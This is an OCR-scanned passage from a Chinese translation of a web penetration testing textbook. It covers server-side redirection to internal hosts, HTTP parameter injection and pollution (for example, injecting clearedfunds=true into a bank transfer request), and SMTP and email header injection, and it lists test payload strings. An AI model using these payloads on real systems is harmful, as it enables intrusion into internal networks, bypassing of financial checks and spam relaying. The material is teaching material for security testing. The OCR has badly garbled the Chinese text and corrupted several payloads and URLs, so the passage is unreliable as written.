提取 的 内 容 。 这 种 技巧 第 用 于 将 儿 个 单独 的 内 部 和 外 部 应 用 程序 组 件 结合 到 一 个 前 端 应 用 程序 
中 ， 再 由 该 应 用 程序 代表 这 些 组 件 实施 访问 控制 和 会 话 管 理 。 如 采 攻 击 者 能 够 控制 后 端 HITTP 请 
求 中 的 了 地 址 或 主机 名 ， 他 就 可 以 使 应 用 程序 服务 带 连 接 到 任意 货源 ， 有 时 甚至 能 够 检索 后 器 啊 
应 的 内 容 。 

以 下 面 的 前 痴 请 求 为 例 ， 其 中 的 1oc 参 数 用 于 指定 客户 端 布 望 查 看 的 CSS 文 件 的 版 本 : 

POST /account/home HTTP/1.1 

Content-Type: application/x-—-www-form-urlencoded 



































Host: wahh-blogs.net 
Content-Length: 65 


view=default&loc=online.wahh blogs. net/ose/Wwahh. ess 

如 采 没 有 在 loc 参 数 中 为 URL 指 定 确 认 机 制 ， 攻击 者 就 可 以 指定 任何 主机 名 来 蔡 代 
online.wahh-blogs.net。 应 用 程序 将 检索 指定 的 资源 ， 导 人 致 攻击 者 将 应 用 程序 用 作 洪 在 的 敏感 后 病 
服务 的 代理 服务 硕 。 在 下 面 的 示例 中 ， 攻 击 者 使 应 用 程序 连接 到 后 端 SSH 服 务 : 


POST /account/home HTTP/1.1 
Content-Type: application/x-—-www-form-urlencoded 

















Host: blogs.mdsec.net 
Content-Length: 65 


view-default&loc-192.168.0.1:22 
应 用 程序 的 啊 应 包含 所 请 求 的 SSH 服 务 的 旗 标 : 


HTTP/1.1 200 OK 
Connection:;: close 


SSH-2.0-OpenSSsH 4.2Protocol mismatch. 
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务 依 ， 





攻击 者 可 以 利用 服务 天 器 HTTP 重 定 回 漏 洞 , 将 吻 受 攻击 的 应 用 程序 作为 开放 的 HITP 代 理 服 

口 攻击 者 可 以 将 该 代理 服务 带 用 于 攻击 互联 网 上 的 第 三 方 系统 。 亚 意 流 量 针 对 的 是 运行 易 
受 攻 击 的 应 用 程序 的 服务 厅 上 的 目标 。 

口 攻击 者 可 以 将 该 代理 服务 带 用 于 连接 到 组 织 内 部 网 络 中 的 任意 主机 ， 从 而 访问 无 法 通过 
特 网 百 接 访 问 的 目标 。 

口 攻击 者 可 以 将 该 代理 服务 带 用 于 反 回 连接 在 应 用 程序 服务 山本 号 上 运行 的 其 他 服务 ， 从 
而 突破 防火 墙 的 限制 ， 并 利用 信任 关系 来 避 开 映 份 验证 。 

口 最 后 ， 攻 击 者 可 以 通过 使 应 用 程序 在 啊 应 中 包含 受 控 的 内 容 ， 利 用 代理 功能 实施 跨 站 点 
脚本 等 攻击 ( 请 参阅 第 12 革 了 解 详细 信息 )。 






































渗透 测试 步 双 





(1) 确定 任何 可 能 包含 主机 名 、IP 地 址 或 完整 URL 的 请 求 参 数 。 
(2) 对 于 每 个 参数 ， 修 改 参 数值 以 指定 其 他 与 所 请 求 的 资源 类 似 的 资源 ， 并 观察 该 资源 是 





人 否 会 出 现在 服务 骼 的 啊 应 中 。 


(3) 答 试 指定 一 个 针对 你 控制 的 因特网 服务 融 的 URL， 并 对 该 服务 僚 进 行 监 视 ， 检 查 来 目 


所 测试 的 应 用 程序 的 传人 连接 。 





(4) 如 果 没 有 收 到 任何 传人 连接 ， 则 监视 应 用 程序 啊 应 所 花费 的 时 间 。 如 采 存 在 延 运 ， 则 


说 明 应 用 程序 的 后 端 请 求 可 能 由 于 出 站 连接 上 的 网 络 限 制导 致 超时 。 


(5) 如 果 你 成 功利 用 相关 功能 连接 到 任意 URL， 则 可 以 尝试 实施 以 下 攻击 。 
(a) 确定 是 否 可 以 指定 端口 号 。 例 如 ， 可 以 指定 http:/mdattackernet:22。 
(b) 如 果 可 以 指定 端口 号 ， 尝 试 使 用 Burp Intruder 等 工具 对 内 部 网 络 进行 端口 扫描 ， 以 
逐个 连接 到 一 系列 IP 地 址 和 端口 ( 请 参阅 第 14 划 了解 详细 信息 )。 
(c) 尝试 连接 到 应 用 程序 服务 硕 的 回环 地 址 上 的 其 他 服务 。 
(d) 答 试 将 受 控 的 Web 页 面 加 载 到 应 用 程序 的 啊 应 中 ， 以 实施 览 站 点 脚本 攻击 。 














注解 ”一 些 服 务 器 端 重 定向 API， 如 ASPNET 中 的 Server.Transfer() 和 Server. 
Execute() ， 仅 可 重 定 向 到 同一 主机 上 的 相关 UREL。 尽 管 如 此 ， 攻 击 者 仍然 可 以 向 这 
些 方法 传递 用 户 提 交 的 输入 ， 以 利用 信任 关系 ， 并 访问 受 平台 级 身份 验证 保护 的 服务 


器 上 的 资源 。 





尝试 访问 


http://mdsec.net/updates/97/ 
http://mdsec.net/updates/99/ 
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10.4.2 HTTP 参数 注入 


如 果 用 户 提交 的 参数 被 用 作 后 端 HITTP 请 求 中 的 参数 ， 这 时 就 会 导致 HTTP 参 数 注入 (HPI )。 
以 下 面 的 之 前 兄 于 受 SOAP 注 入 的 银行 转账 功能 〈 稍 作 修改 ) 为 例 : 
POST /bank/48/Default.aspx HITTP/1.0 


Host: mdsec.net 
Content-Length: 65 

















FromAccount=18281008&Amount=1430&ToACCount=08447656&Submit=Submit 
这 个 前 并 请 求 由 用 户 的 浏览 帮 提 出 ,将 导致 应 用 程序 癌 银 行 基础 架构 中 的 男 一 台 Web 服 务 帮 
提出 其 他 HTTP 请 求 。 在 以 下 后 端 请 求 中 ， 应 用 程序 从 前 并 请 求 中 复制 了 一 些 参数 值 . 


POST /doTransfer.asp HTTP/1.0 

Host: mdsec-mgr.int.mdsec.net 
Content-Length: 44 
fromacc=18281008&amount=1430&toacc=08447656 


这 个 请 求 要 求 后 问 服 务 絮 检查 是 否 有 清算 资金 可 以 转账 ， 如 有 果 有 ， 则 进行 转账 。 但 是 ， 前 问 
服务 右 可 以 通过 提供 以 下 参数 ， 指 定 存在 清算 资金 ， 从 而 避 开 上 述 检 查 : 

clearedfunds=true 

如 果 攻 击 者 发 现 这 种 行为 ， 他 就 可 以 符 试 实施 HPI 攻 击 ， 在 后 端 请 求 中 注入 clearedfunds 
参数 。 要 注入 该 参数 , 他 将 所 需 参数 附加 到 现 有 参数 值 的 后 面 , 并 将 分 隔 名 称 和 值 的 & 和 = 字符 进 
行 URL 纺 僻 ， 如 下 所 示 : 


POST /bank/48/Default.aspx HTTP/1.0 
Host: mdsec.net 
Content-Length: 96 










































































FromAccount=18281008&Amount=1430&ToAccount=08447656%26clearedfunds$%S3dtru 
ee&Submit=Submit 


当 应 用 程序 服务 器 人 处理 这 个 请 求 时 , 它 会 以 正常 方式 对 参数 值 进行 URL 人 解码 。 因 此 ， 前端 应 
用 程序 收 到 的 ToAccount 参 数 的 值 为 : 


08447656&Cclearedfunds=true 

如 琳 前 端 应 用 程序 没有 确认 这 个 值 并 将 它 按 原样 传递 给 后 并 请 求 , 应 用 程序 将 提出 以 下 后 站 
请 求 ， 使 攻击 者 能 够 成 功 避 开 清 算 资 金 检查 : 

POST yooTraneTer, osy 有 ITE LU 


Host: mdsec-mgr. int.mdsec.net 
Content-Length: 62 























fromacc=18281008&amount=1i430&toacc=0844765065&c1learedfunds=true 


党 试 访 问 


http://mdsec.net/bank/48/ 





288 第 10 章 测试 后 端 组 件 


注解 ”与 SOAP 注 入 不 同 ， 在 后 端 请 求 中 注入 任意 异常 参数 不 会 导致 任何 错误 。 因 此 ， 
要 想 成 功 实施 攻击 ， 需 要 清楚 了 解 应 用 程序 具体 使 用 了 哪些 后 端 参 数 。 在 黑金 环境 下 ， 





很 难 确定 这 些 信息 ; 但 是 ， 如 果 应 用 程序 使 用 任何 可 以 获取 或 搜索 其 代码 的 第 三 方 组 
件 ， 那 么 就 可 以 轻易 获得 这 些 信 息 。 





1. HTTP 参 数 污染 

HPP 是 一 种 可 用 于 各 种 环境 下 的 攻击 技巧 〈 请 参阅 第 12 章 和 第 13 音 了解 其 他 示例 )， 这 种 技 
巧 常用 在 HPI 攻 击 中 。 

如 果 请 求 中 包含 多 个 同名 请 求 ， 这 时 Web 服 务 需 该 如 何 处理 ? 对 于 这 一 问题 ，HTTP 规 范 并 
未 提供 任何 指导 。 实 际 上 ， 各 种 Web 服 务 器 的 处 理 方式 各 不 相同 ， 以 下 是 一 些 常见 的 处 理 方式 。 

口 使 用 参数 的 第 一 个 实例 。 

口 使 用 参数 的 最 后 一 个 实例 。 

口 串联 参数 值 ， 可 能 在 参数 之 间 添 加 分 隅 符 。 

口 构建 一 个 包含 所 有 请 求 值 的 数组 。 

在 前 面 的 HPI 示 例 中 ， 攻 击 者 可 以 在 后 端 请 求 中 添加 一 个 新 参数 。 实 际 上 ， 攻 击 者 可 以 对 其 
实施 注入 攻击 的 请 求 很 可 能 已 经 包含 一 个 与 攻击 者 所 针对 的 参数 同名 的 参数 。 在 这 种 情况 下 , 攻 
击 者 可 以 使 用 HPI 条 件 注 入 另 一 个 同名 参数 。 随 后 ， 应 用 程序 将 表现 出 何 种 行为 ， 将 取决 于 后 
端 HITTP 服 务 需 如 何 处 理 重 复 的 参数 。 这 样 ， 攻 击 者 或 许可 以 用 他 注入 的 参数 值 “覆盖 ”原始 
参数 值 。 

例如 ， 如 果 原 始 的 后 端 请 求 为 : 

POST /doTransfer.asp HTTP/1.0 


Host: mdsec-mgr.int.mdsec.net 
Content-Length: 62 












































fromacc=18281008&amount=1430&clearedfunds=false&toacc=08447656 
并 且 后 问 服 务 融 使 用 任何 重复 的 参数 的 第 一 个 实例 , 则 攻击 者 可 以 对 前 端 请 求 中 的 FromAccount 
参数 实施 攻击 ， 如 下 所 示 : 

POST ybank/S2/Default.aspx HTITP/1.0 


Host: mdsec,.net 
Content-Length: 96 





FromAccount=18281008%26clearedfunds%3dtrue&kAmount=1430&ToAccount=0844765 
S&Submit=Submit 


相反 , 在 这 个 示例 中 ,如果 后 端 服务 需 使 用 任何 重复 的 参数 的 最 后 一 个 实例 , 则 攻击 者 可 以 
对 前 问 请 求 中 的 roAccount 人 参数 实施 攻击 。 
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尝试 访问 
http://mdsec.net/bank/52/ 
http:/ mdsec.net/bank/37/ 





HPP 攻 击 能 人 否 成 功 ,在 很 大 程度 上 取决 于 目标 应 用 程序 服务 融 如 何 处 理 多 个 同名 参 效 ， 以 及 
后 端 请 求 中 的 插入 点 是 否 准 确 。 如 果 两 种 技术 需要 处 理 相 同 的 HTTP 请 求 ，HPP 攻 击 就 会 造成 严 
重 的 后 末 。Web 应 用 程序 防火 增 或 反 向 代理 可 能 会 处 理 某 个 请 求 ， 并 将 其 传递 给 Web 应 用 程序 ， 
由 Web 应 用 程序 抛弃 变量 ， 其 至 是 基于 之 前 不 相关 的 请 求 部 分 构建 字符 串 。 

欲 了 解 沼 见 应 用 程序 服务 带 在 处 理 同名 参数 时 的 不 同行 为 ， 请 参阅 以 下 论文 : 

WWww.owasp.org/iImages/b/ba/AppsecEU09 CarettoniDiPaola v0.8.pdf 

2. 攻击 URL 和 转换 

许多 服务 需 会 在 所 请 求 的 URL 抵 达 时 重 写 这 些 URL, 再 将 它们 映射 到 应 用 程序 中 的 相关 后 端 
功能 。 除 传统 的 URL 重 写 外 ， 服 务 器 在 处 理 REST 风 格 的 参数 、 定 制导 航 包装 器 以 及 其 他 URL 转 
换 方 法 时 都 会 进行 URL 和 草 写 。 这 种 处 理 方 式 可 能 易 受 HPI 和 HPP 攻 击 。 

为 了 人 简化 和 便于 导航 ,一些 应 用 程序 在 URL 的 文件 路 径 ， 而 非 查询 字符 串 中 插入 参数 值 。 通 
常 ， 应 用 程序 会 通过 一 些 简 单 的 规则 转换 URL， 然 后 将 其 转发 给 真正 的 日 标 。Apache 中 的 以 下 
mod_rewrite 规 则 用 于 人 处理 可 公共 访问 的 用 户 资 料 : 


RewriteCond S${THE REQUEST} 人 ^[A-Z]{3,9}\ /pub/user/[^\&]l*\ HTTP/ 
RewriteRule ^pub/user/ ([^/\.1+)s$ /inc/user mgr .php?mode=viewé&name=$1 


此 规则 接受 非常 简洁 的 请 求 ， 例 如 : 

/pub/user/marcus 
并 将 这 些 请 求 转换 为 后 端 请 求 ， 以 便于 用 户 管理 页 面 user_mgrphp 包 含 的 view 功 能 进行 处 理 。 它 
将 marcus 参 数 移 人 查询 字符 串 并 添加 mode=view 参 数 : 

/inc/user mar.php?rmode=view&name=marcus 

在 这 种 情况 下 , 攻击 者 就 可 以 利用 HPI 攻 击 在 经 过 重 写 的 URL 中 注入 为 一 个 mode 参 数 , 例 如 ， 
如 果 攻 击 者 请 求 : 

/pub/user/marcus%s26mode=edit 
将 URL 编 码 的 值 般 入 经 过 重 写 的 URL 中 ， 将 得 到 . 

/inc/user mgr.php?mode=view&name=marcustmode=edit 

讲 HPP 攻 击 的 我 们 说 到 ， 这 种 攻击 能 和 否 成 功 取决 于 服务 需 如 何 处 理 重 复 的 参数 。 在 PHP 平 台 
中 ，mode 参 数 被 视 为 具有 值 edit， 因 而 攻击 取得 成 功 。 
























































渗透 测试 步 双 





(1) 轮流 针对 每 个 请 求 参 数 进行 测试 ， 尝 试 使 用 各 种 语法 添加 一 个 新 注入 的 参数 。 





URL 编 码 的 &foo0=bar 
URL 编 码 的 ; f00=bar 


UD %$26foo%3dbar 
UD %$3pbfoo%3dbar 
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2526f60%255dBar 双重 URL 编 码 的 &fo00=bar 
(2) 确定 任何 修改 后 不 会 改变 应 用 程序 的 行为 的 参数 实例 〈 仪 适用 于 在 修改 后 会 在 应 用 程 
序 的 响应 中 造成 某 种 差异 的 参数 )。 
(3) 在 上 一 步 确定 的 每 个 实例 都 可 以 实施 参数 注入 。 尝 试 在 请 求 的 不 同位 置 注 入 一 个 已 知 
的 参数 ， 看 这 样 做 是 否 可 以 履 盖 或 修改 现 有 的 某 个 参数 。 例 如 : 


FromAccount=18281008%26Amount%3d4444&Amount=1430&ToAcco 
unt=08447656 


(4) 如 有 果 这 样 做 会 将 现 有 值 蕉 换 为 新 值 ， 确 定 是 否 可 以 通过 注入 一 个 由 后 端 服务 侣 读 取 的 
值 来 避 开 任何 前 端 确 认 机 制 。 

(5) 用 其 他 参数 名 称 蔡 换 注入 的 已 知 参 数 ， 如 第 4 章 介绍 应 用 程序 解析 和 内 容 查 找 时 所 述 。 

(6) 测试 应 用 程序 是 否 允 许 在 请 求 中 多 次 提交 同一 个 参数 。 在 其 他 参数 前 后 ， 以 及 请 求 的 
不 同位 置 (查询 字符 串 、cookie 和 消息 主体 中 ) 提交 多 余 的 值 。 





























10.5 注入 电子 邮件 


许多 应 用 程序 拥有 一 项 允许 用 户 通 过 应 用 程序 提交 消息 的 功能 。 例 如 , 回 文 择 人 员 报告 问 题 
或 提供 关于 Web 站 点 的 反馈 。 这 项 功能 一 般 通 过 邮件 (或 SMTP ) 服务 需 执 行 。 通 稼 ， 用 户 提 交 
的 输入 被 插入 到 邮件 服务 大 处 理 的 SMTP 会 话 中 。 如 采 攻 击 者 能 够 提 和 交 未 被 过 滤 或 净化 的 专门 设 
计 的 输入 ， 就 可 以 在 这 个 会 话 中 注入 任意 SMTP 命 令 。 

多 数 时 候 ， 应 用 程序 允许 用 户 指 定 消 息 的 内 容 和 目 己 的 电子 邮件 地 址 〈 插 入 到 生成 电子 
邮件 的 From 字 段 中 )， 还 可 以 指定 消息 的 主题 和 其 他 细 市 。 能 够 控制 的 任何 字段 部 易于 受到 
SMTP 注 入 。 

SMTP 注 入 漏洞 经 党 被 垃圾 邮件 发 送 者 利用 ， 他 们 扫描 因特网 查找 易 受 攻击 的 邮件 表单 ， 并 
使 用 它们 生成 大 量 垃圾 电子 邮件 。 


10.5.1 操纵 电子 邮件 标 头 
以 图 10-6 所 示 的 表单 为 例 ， 它 允许 用 户 发 送 关 于 应 用 程序 的 反馈 。 


W a 
TOUT emaill address marcus@wahh-mailcom 


Subject Site problem 


ee 本 
Lomment Confirm Order page doesn't load 























Submit comments 


图 10-6 一 个 典型 的 站 点 反馈 表单 





在 该 表单 中 ， 用 户 可 指定 发 件 人 【( From ) 地 址 和 邮件 的 内 容 。 应 用 程序 将 这 个 输入 传送 给 
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PHPmail () 命 令 , 由 它 建 立 邮 件 并 与 它 配置 的 邮件 服务 名 进行 必要 的 SMTP 会 话 。 生 成 的 邮件 如 下 : 


To: adminewahnn-app .com 
From: marcusG@wahh-mail.com 
Subject: Site problem 


Confirm Order page doesn't load 


PHP mail () 命 令 使 用 additional headers 参 数 为 消息 设 定 发 件 人 地 址 。 这 个 参数 还 可 用 
于 指定 其 他 标 头 ， 包 括 Cc 和 Bcc， 并 用 换行 符 分 隅 每 个 被 请 求 的 标 头 。 因 此 ， 攻 击 者 可 以 通过 在 
From 字 段 中 注入 这 其 中 某 个 标 头 ， 将 邮件 发 送 给 任意 收 件 人 ， 如 图 10-7 所 示 。 





| CC* = 
Your emall address marcus@wahh-mail com%0aBcc:all@wahh-othercompany.com 


Subject: Site problem 


Comment - Confirm Order page doesn't load 


Submitcomments 





图 10-7 电子 邮件 标 头 注入 攻击 
这 会 导致 mai1 () 命 令 生 成 以 下 邮件 : 


To: admin@wahh-app.com 

From: marcus@wahh-—mail.com 
Becc: all@wahh-othercompany .Com 
Subject: Site problem 


Confirm Order page doesn't loaqd 


10.5.2 ” SMTP 命令 注入 


在 其 他 情况 下 ， 应 用 程序 可 能 会 执行 SMTP 会 话 ， 或 者 将 用 户 提 交 的 输入 传送 给 一 个 不 同 的 
组 件 以 完成 这 一 任务 。 这 这 时 ， 我 们 就 可 以 直接 在 这 个 会 话 中 注入 任意 SMTP 命 令 ， 完 全 控制 由 应 
用 程序 生成 的 消息 。 

例如 ， 以 一 个 使 用 以 下 请 求 提 区 站 点 反 锯 的 应 用 程序 为 例 : 


POST feeaqQhpback .PhPp HTTP/1.! 
Host: wahh-app.com 
Content-Length: 56 




















From=daf@wahh-mail.comtkSubject=Site+tfeedback&Message=foc 


应 用 程序 会 使 用 以 下 命令 开始 一 个 SMTP 会 话 : 


MAIL FROM: daf@wahh-mail.com 
RCPT TO: feedback@wahh-app.com 
DATA 


From: daf@wahh-malil.com 
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To: feedback@adwahh-app.com 
Subject: Site feedback 
foo 


注解 SMTP 客 户 端 发 出 DATA 命 令 后 ， 应 用 程序 送出 电子 邮件 消息 的 内 容 





头 和 主体 ， Se 点 字符 (. )。 这 告诉 服务 器 消息 已 发 送 完 毕 ， 客 户 端 可 以 发 
出 其 他 SMTP 命 令 ， 发送 i 





这 时 ， 攻 击 者 可 以 在 任何 受 控 的 电子 邮件 字段 中 注入 任意 SMTP 命 令 。 例 如 ， 他 可 以 尝试 注 
和信 subject 字 段 ， 如 下 所 示 : 


POST feedback .php HTTP/1.1 
Host: wahh-app.com 
Content-Length: 266 


From-daf@wahh-—mail.com&Subject=Sitetfeedback%®%0d%0afoo%S0Od%S0a%s2e$s0d 
SOaMAIL+FROM: +mail@wahh-viagra.com%O0d%O0aRCPT+TO: +john@wahh-mail 
.Com$sO0d%sS0aDATA%SOd%O0aFrom: +mail@wahh—viagra.com%S0d%S0O0aTo:+john@wahh—mail 
.Com%s0O0d%sS0asubject:+Cheap+VIiAGRA4%0d%0aBlah%$0d%S0as$s2e%s0d$s0agkMessage=foo 


如 果 应 用 程序 易 受 攻击 ， 那 么 会 建立 以 下 SMTP 会 话 ， 它 生成 两 个 不 同 的 电子 邮件 消息 ， 其 
中 第 二 个 完全 由 攻击 者 控制 : 


MAIL FROM: daf@wahh-mail.com 
RCPT TO: feedback@wahh-app.com 
DATA 

From: daf@wahh-mail.com 








To: feedbackadwahh-app.com 
Subject: Site+feedback 
foo 


MAIL FROM: mailQ@wahh-viagra.com 
RCPT TO: johnQwahh-mail.com 
DATA 

From: mail@Qwahh-viagra.com 

To: JjJohn@wahh-mail.com 

Subject: Cheap V1IAGR4 

Blah 


foo 


10.5.3 ”查找 SMTP 注 入 漏洞 


为 了 有 效 探查 应 用 程序 的 邮件 功能 ， 需 要 测试 每 一 个 提交 给 与 电子 邮件 有 关 的 功能 的 参数 ， 
甚至 那些 最 初 可 能 与 生成 的 消息 无 关 的 参数 。 
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渗透 测试 员 还 应 该 测试 每 一 种 攻击 ， 并 在 每 个 测试 中 使 用 Windows 和 UNIX 形 式 的 换行 符 。 





渗透 测试 步 又 


(GD) 应 当 轮 流 提交 下 面 的 每 个 测试 字符 串 作 为 每 一 个 参数 , 在 相关 位 置 插入 电子 邮件 地 址 。 


<youremail>%0aCc:<youremail> 





<youremail>%0d%0aCc:<youremail> 
<youremail>%0aBcc:<youremail> 
<youremail>%0d%0aBcc:<youremail> 


S$0aDATA%SO0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<Yy 
Oouremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0as 
ubject:+test%0afoo%0a%2e%0a 


$0d%0aDATA%S0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0 
d%$0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>% 
0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0 
afoo%0d%0a%2e%0d%0a 


(2) 留意 应 用 程序 返回 的 任何 错误 消息 。 如 果 这 些 错 误 与 电子 邮件 功能 中 的 任何 问题 有 关 ， 
确定 是 否 需 要 对 输入 进行 调整 ， 以 利用 漏洞 。 

(3) 应 用 程序 的 响应 可 能 并 不 会 以 任何 形式 表示 一 个 漏洞 存在 或 被 成 功利 用 。 应 该 监控 指 
定 的 电子 邮件 地 址 ， 看 是 否 收 到 任何 电子 邮件 。 

(4) 仔细 检查 生成 相关 请 求 的 HTML 表 单 。 它 们 可 能 提供 与 服务 需 端 使 用 的 软件 有 关 的 线 
索 。 其 中 可 能 包含 一 个 用 于 指定 电子 邮件 收 件 人 地 址 的 隐藏 或 禁用 字段 ， 可 以 直接 对 其 进行 
修改 。 

















提示 “向 应 用 程序 支持 人 员 发 送 电子 邮件 的 功能 常常 被 视 为 外 围 功能 ， 应 用 程序 可 能 
并 不 对 其 采用 与 主要 功能 相同 的 安全 标准 ， 或 者 进行 严格 的 测试 。 而 且 ， 因 为 它们 需 


要 连接 不 常用 的 后 端 组 件 , 应 用 程序 往往 通过 直接 调用 相关 操作 系统 命令 来 执行 它们 。 
因此 ， 除 探查 SMTP 注 入 漏洞 外 , 还 应 极其 仔细 地 检查 所 有 与 电子 邮件 有 关 的 功能 ,， 查 
找 OS 命 令 注 入 漏洞 。 





10.5.4 防止 SMTP 注 入 


如 果 对 提交 给 电子 邮件 功能 或 SMTP 会 话 使 用 的 任何 用 户 提 交 的 数据 进行 严格 的 确认 检查 ， 
就 可 以 防止 SMTP 注 入 源 洞 。 因 此 ， 应 根据 其 用 途 对 每 项 数据 进行 尽 可 能 严格 的 确认 。 
口 应 根据 一 个 适当 的 正则 表达 式 检查 电子 邮件 地 址 ( 当然 应 拒绝 所 有 换行 从 )。 
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D 消息 主题 不 得 包含 任何 换行 竺 ， 并 应 实施 适当 的 长 度 限 制 。 
口 如 宁 消 息 内 容 被 一 个 SMTP 会 话 直 接 使 用 ， 那 么 应 禁止 使 用 仅 包含 一 个 点 字符 的 消息 行 。 


10.6 ”小结 


我 们 已 经 分 析 了 一 系列 针对 后 端 应 用 程序 组 件 的 攻击 , 了 解 到 确定 并 利用 每 一 种 漏洞 所 需 采 
取 的 实际 步 又。 许多 现实 世界 的 漏洞 ， 使 用 应 用 程序 后 立即 就 会 发 现 , 例如 ,通过 在 搜索 框 中 输 
入 异 币 语法 进行 搜索 。 态 外 , 这些 泼 洞 可 能 隐藏 得 非常 深 , 极 少 给 应 用 程序 造成 可 以 检测 的 行为 
差 寞 ， 也 无 法 通过 提交 并 操纵 专门 设计 的 输入 的 多 阶段 过 程 发 现 。 

要 确定 应 用 程序 中 存在 的 后 端 注入 缺陷 , 需要 进行 耐心 仔细 的 检测 。 实 际 上 ， 几 乎 每 一 种 注 
入 缺陷 都 会 在 处 理 用 户 提交 的 数据 过 程 中 表露 出 来 ， 这 些 数 据 包括 碍 询 字 符 串 参数 的 名 称 与 值 、 
POST 数据 、cookie 以 及 其 他 HTTP 消 息 头 。 许 多 时 候 ， 只 有 在 全 面 探查 了 相关 参数 ， 明 确 了 解 应 
用 程序 对 输入 执行 了 何 种 类 型 的 处 理 ， 并 排除 测试 过 程 中 的 障碍 后 ， 漏 洞 才 会 显露 出 来 。 

面 对 后 端 应 用 程序 组 件 的 攻击 造成 了 大 量 港 在 的 受 攻 击 面 , 渗透 测试 员 可 能 党 得 对 应 用 程序 
实施 任何 严重 的 攻击 都 必须 付出 巨大 的 努力 。 然 而 ,从 很 大 程度 上 讲 ,实施 有 效 攻 击 需 要 从 和 直觉 
上 了 解 源 洞 的 位 置 ， 以 及 如 何 对 其 加 以 利用 。 获 得 这 种 直觉 的 唯一 途径 是 进行 实践 ,针对 在 现实 
中 遇 到 的 应 用 程序 读 练 前 面 描述 的 技巧 ， 并 观察 它们 如 何 应 对 这 些 攻击 。 






























































10.7 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh 。 

(1) 某 网 络 设备 提供 用 于 执行 设备 配置 的 Web 界 面 。 为 什么 这 种 功能 通常 易于 受到 操作 系统 
命令 注入 攻击 ? 

(2) 在 测试 以 下 URL 时 : 

http://wahh-app.com/home/statsmgr .aspx?country=US 

将 country 人 参数 的 值 更 改 为 foo 导 致 以 下 错误 消息 : 

Could not open file: D:\app\default\home\logs\foo.log (invalid file). 

可 以 采取 哪些 步骤 对 应 用 程序 实施 攻击 ? 

(3) 在 对 一 个 在 POST 请 求 中 以 XML 格式 传送 数据 的 应 用 程序 进行 测试 时 , 可 以 利用 哪 种 漏洞 
从 服务 器 的 文件 系统 中 读 取 任意 文件 ”要 成 功 实施 攻击 ， 必 须 满 足 哪 些 先 决 条 件 ? 

(4) 向 ASPNET 平 台 上 运行 的 应 用 程序 提出 以 下 请 求 : 


POST /home.aspx?p=urlparaml&p=urlparam2 HTTP/1.1 











Host: wahh--app.com 

Cookie: p=cookieparam 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 15 


p=bodyparam 
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应 用 程序 执行 以 下 代码 : 

String param = Request.Params["p"]; 

请 问 param 变 量 的 值 是 什么 ? 

(5) HPP 是 HPI 的 前 提 ， 还 是 HPI 是 HPP 的 前 提 ? 

(6) 某 应 用 程序 包含 一 项 功能 ， 该 功能 回 外 部 域 提 出 请 求 ， 并 返回 这 些 请 求 的 啊 应 。 为 防止 
服务 侨 端 重 定 癌 攻 击 检索 应 用 程序 自己 的 Web 服 务 右 上 的 受 保护 资源 ， 应 用 程序 阻止 了 以 
localhost 或 127.0.0.1 为 目标 的 请 求 。 如 何 突 破 这 种 防御 ， 以 访问 服务 右上 的 资源 ? 

(7) 某 应 用 程序 使 用 一 项 用 于 提交 用 户 反 馈 的 功能 。 该 功能 允许 用 户 提 交 他 们 的 电子 邮件 地 
址 、 邮 件 主题 及 详细 的 反馈 。 然 后 ， 应 用 程序 以 用 户 提 交 的 主题 和 反馈 为 邮件 正文 ,从 用 户 的 电 
子 邮件 地 址 回 feedback@wahh-app.com 发 送 一 封 电 子 邮 件 。 以 下 哪 一 种 方法 能 够 有 将 防 御 邮 件 注 
入 攻击 ? 

(a) 在 邮件 服务 硕 上 禁用 邮件 中 继 。 
(b) 使 用 feedback@wahh-app.com 便 编码 RCPT To 字段 。 
(c) 确保 用 户 提交 的 输入 不 包含 任何 换行 符 或 其 他 SMTP 元 字符 。 





















































攻击 应 用 程序 远 辑 








PF 有 Web 应 用 程序 都 通过 人 逻辑 实现 各 种 功能 。 从 根本 上 讲 ， 用 编程 语言 编写 代码 就 是 把 
一 个 复杂 的 进程 分 解 成 一 些 非常 简单 而 又 相互 独立 的 逻辑 步 又 。 将 一 项 对 人 类 有 用 的 
功能 转换 成 一 系列 计算 机 能 够 执行 的 细微 操作 ， 需 要 和 苔 握 大 量 的 技 马 并 进行 周密 的 安排 。 顺 利 、 
安全 地 完成 以 上 任务 就 更 显 困难 。 如 采 由 痛 景 各 不 相同 的 开发 者 与 程序 员 并 行 开发 同一 个 应 用 程 
序 ， 那 么 在 这 个 过 程 中 可 能 会 发 生 很 多 错误 。 

在 所 有 即使 是 非 第 简单 的 Web 应 用 程序 中 ， 每 个 阶段 都 会 执行 数目 庞大 的 人 逻辑 操作 。 这 些 好 
辑 代 表 着 一 个 复杂 的 受 攻击 面 , 它 虽 然 从 未 消失 , 但 往往 被 人 们 忽略 。 许 多 代码 审查 与 渗透 测试 
主要 针对 和 常见 的 “头条 ” 式 漏洞 ， 如 SQL 注 入 和 跨 站 点 脚本 ， 因 为 它们 具有 容易 辨别 的 签名 ， 人 
们 对 它们 的 利用 方法 也 进行 了 广泛 的 研究 。 相 反 , 应 用 程序 的 逻辑 缺陷 更 难以 辨别 : 每 一 种 缺陷 
似乎 都 是 唯一 的 , 通常 目 动 源 洞 扫描 副 也 无 法 发 现 它们 。 因 此, 它们 并 未 受到 应 有 的 重视 与 天 注 ， 
攻击 者 对 之 非常 感 兴趣 。 

本 草 将 措 述 各 种 笛 见 的 Web 应 用 程序 逻辑 缺陷 , 以 及 渗透 测试 员 在 控 碍 与 攻击 应 用 程序 逻辑 
时 震 要 采取 的 实用 步 又 。 我 们 将 举 出 一 系列 实际 示例 ， 每 个 示例 说 明 一 种 不 同 的 逻辑 缺陷 , 它们 
共同 说 明 设 计 者 与 开发 者 做 出 的 假设 可 能 会 直接 导致 逻辑 缺陷 ， 在 应 用 程序 中 造成 安全 漏洞 。 


11.1 逻辑 缺陷 的 本 质 


Web 应 用 程序 中 的 逻辑 缺陷 各 不 相同 。 它 们 包括 代码 中 的 简单 错误 ， 以 及 几 种 应 用 程序 核心 
组 件 互 操作 方面 的 极其 复杂 的 漏洞 。 有 了 时候 ， 这些 缺陷 非常 明显 ,很 容易 发 现 ; 但 是 ， 有 些 缺 陷 
